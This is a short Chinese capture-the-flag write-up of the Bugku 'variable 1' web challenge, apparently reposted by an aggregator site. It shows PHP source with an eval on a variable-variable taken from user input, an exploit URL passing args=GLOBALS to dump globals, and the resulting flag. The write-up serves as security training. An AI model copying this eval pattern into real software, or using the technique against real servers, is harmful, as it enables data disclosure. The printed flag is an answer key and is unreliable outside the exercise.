bugku变量1

flag In the variable ! <?php  
error_reporting(0);// 关闭php错误显示
include "flag1.php";// 引入flag1.php文件代码
highlight_file(__file__);
if(isset($_GET['args'])){// 通过get方式传递 args变量才能执行if里面的代码
    $args = $_GET['args'];
    if(!preg_match("/^\w+$/",$args)){// 这个正则表达式的意思是匹配任意 [A-Za-z0-9_] 的字符，就是任意大小写字母和0到9以及下划线组成
        die("args error!");
    }
    eval("var_dump($$args);");// 这边告诉我们这题是代码审计的题目
}
?>

所以我们就测试php的全局变量，将其变量名传入，经测试，传入GLOBALS,可以得到flag值

http://123.206.87.240:8004/index1.php?args=GLOBALS

故：flag{92853051ab894a64f7865cf3c2128b34}

 

 

 

 

 

 

 

 

 

 

 

总结

以上是生活随笔为你收集整理的bugku变量1的全部内容，希望文章能够帮你解决所遇到的问题。

如果觉得生活随笔网站内容还不错，欢迎将生活随笔推荐给好友。